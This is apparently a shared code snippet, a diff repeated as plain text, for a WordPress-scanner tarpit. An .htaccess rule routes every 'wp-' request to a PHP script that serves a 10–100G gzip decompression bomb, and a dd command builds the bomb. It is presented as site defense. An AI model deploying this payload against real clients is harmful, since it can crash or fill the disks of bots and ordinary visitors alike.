Firesphere · May 14, 2020 08:27 · Firesphere · Feb 21, 2020
diff --git a/.htaccess b/.htaccess
 RewriteEngine On
 RewriteCond %{REQUEST_URI} !^wp-admin.php
 # Anything that has "wp-" in its request, will be send to the bomb
 RewriteRule ^(.*)wp-(.*)$ wp-admin.php [L]

diff --git a/explain.txt b/explain.txt
 Generate a gzip bomb:
 dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

 Up the count to whatever you like, if you want more, just up the count. This example is 10G after unzipping. But 100G works just fine.
diff --git a/wp-admin.php b/wp-admin.php
 sendBomb();
 function sendBomb(){
        // Turns out, original came from https://blog.haschek.at/2017/how-to-defend-your-website-with-zip-bombs.html
        // I did not realise that, I only googled it a bit and took the relative parts plus the comments to make clear
        /// what is going on.
        // Many thanks to Christian for the original code. I did not intent to "steal" it and make it my own.
        // The following is mostly from Christian, with a minor tweak. He/She deserves the praise for this gzip idea. I only polished it a bit.
        //prepare the client to recieve GZIP data. This will not be suspicious
        //since most web servers use GZIP by default
        header("Content-Encoding: gzip");
        header("Content-Length: ".filesize('/path/to/100G.gzip'));
        //Turn off output buffering
        if (ob_get_level()) ob_end_clean();
        //send the gzipped file to the client
        readfile('/path/to/100G.gzip');
 exit;
 }
	RewriteEngine On
	RewriteCond %{REQUEST_URI} !^wp-admin.php
	# Anything that has "wp-" in its request, will be send to the bomb
	RewriteRule ^(.)wp-(.)$ wp-admin.php [L]
	Generate a gzip bomb:
	dd if=/dev/zero bs=1M count=10240 \| gzip > 10G.gzip

	Up the count to whatever you like, if you want more, just up the count. This example is 10G after unzipping. But 100G works just fine.
	sendBomb();
	function sendBomb(){
	// Turns out, original came from https://blog.haschek.at/2017/how-to-defend-your-website-with-zip-bombs.html
	// I did not realise that, I only googled it a bit and took the relative parts plus the comments to make clear
	/// what is going on.
	// Many thanks to Christian for the original code. I did not intent to "steal" it and make it my own.
	// The following is mostly from Christian, with a minor tweak. He/She deserves the praise for this gzip idea. I only polished it a bit.
	//prepare the client to recieve GZIP data. This will not be suspicious
	//since most web servers use GZIP by default
	header("Content-Encoding: gzip");
	header("Content-Length: ".filesize('/path/to/100G.gzip'));
	//Turn off output buffering
	if (ob_get_level()) ob_end_clean();
	//send the gzipped file to the client
	readfile('/path/to/100G.gzip');
	exit;
	}